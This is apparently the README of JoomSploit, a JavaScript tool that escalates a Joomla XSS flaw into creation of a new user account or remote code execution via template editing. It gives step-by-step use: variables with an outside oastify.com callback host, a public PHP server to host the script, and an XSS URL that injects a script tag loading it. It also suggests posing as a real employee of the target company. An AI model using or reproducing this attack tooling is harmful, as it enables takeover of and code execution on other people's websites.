About - Key Features - How To Use - Examples - Contributing
JoomSploit is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in Joomla CMS.
🌾 This script provides support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X.
- Privilege Escalation
- Creates an user in Joomla.
- (RCE) Built-In Templates Edit
- Edit a Built-In Templates in Joomla.
- (Custom) Custom Exploits
- Custom Exploits for Third-Party Joomla Plugins.
example.mp4
1) Clone the Repository
git clone https://github.com/nowak0x01/JoomSploit2) Edit the script by selecting the desired function and modifying its variable values. (Example: JLCreateAccount)
// ************************************ ~% Variables %~ ************************************ //
var Target = "http://10.5.87.12:8000/"; // Ex: https://192.168.1.99:6731/joomla/
var Callback = "https://prkiw0jsy7n0dj9qknrm57h9006ruji8.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).
// ************************************ ~% Functions %~ ************************************ //
// JLCreateAccount(); // (Privilege Escalation) - Creates an user in Joomla.
// JLEditTemplates(); // (RCE) - Edit Templates in Joomla.
// CustomExploits(); // (Custom) - Custom Exploits for Third-Party Joomla Plugins.
function JLCreateAccount() {
/* ************************************************************************************************************************************************ */
var Username = "nowak"; // (It is recommended to use a valid employee name from the target company). - <Mandatory>
var Name = "Hudson Nowak"; // Account name, Ex: Robert Silva. - <Mandatory>
var Password = `j^QEkyvd7*g3`; // (Password minimum length: 12) [weak password are allowed]. - <Mandatory>
var Email = "nowak@example.com"; // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
/* ************************************************************************************************************************************************ */
3) Start a web server
php -S 0.0.0.0:80 -t .4) Go to the Joomla XSS vector and include JoomSploit.js
https://example.com/plugin.php?s=<script%20src="//VPS/JoomSploit.js"></script>
🎋 JLCreateAccount() - Creates an user in Joomla.
CreateAccount.mp4
🐉 JLEditTemplates() - Edit a Built-In Templates in Joomla.
EditTemplates.mp4
⭐️ CustomExploits() - Custom Exploits for Third-Party Joomla Plugins.
// pending
If you're interested in contributing, whether by adding new exploit functions to CustomExploits() or enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better😊.
/T /I
/ |/ | .-~/
T\ Y I |/ / _
/T | \I | I Y.-~/
I l /I T\ | | l | T /
T\ | \ Y l /T | \I l \ ` l Y
__ | \l \l \I l __l l \ ` _. |
\ ~-l `\ `\ \ \\ ~\ \ `. .-~ |
\ ~-. "-. ` \ ^._ ^. "-. / \ |
.--~-._ ~- ` _ ~-_.-"-." ._ /._ ." ./
>--. ~-. ._ ~>-" "\\ 7 7 ]
^.___~"--._ ~-{ .-~ . `\ Y . / |
<__ ~"-. ~ /_/ \ \I Y : |
^-.__ ~(_/ \ >._: | l______
^--.,___.-~" /_/ ! `-.~"--l_ / ~"-.
(_/ . ~( /' "~"--,Y -=b-. _) JoomSploit (https://github.com/nowak0x01/JoomSploit)
(_/ . \ : / l c"~o \
\ / `. . .^ \_.-~"~--. )
(_/ . ` / / ! )/
/ / _. '. .': / '
~(_/ . / _ ` .-<_
/_/ . ' .-~" `. / \ \ ,z=.
~( / ' : | K "-.~-.______//
"-,. l I/ \_ __{--->._(==.
//( \ < ~"~" //
/' /\ \ \ ,v=. ((
.^. / /\ " }__ //===- `
/ / ' ' "-.,__ {---(==- @Author: Hudson Nowak
.^ ' : T ~" ll
/ . . . : | :! \\
(_/ / | | j-" ~^
~-<_(_.^-~"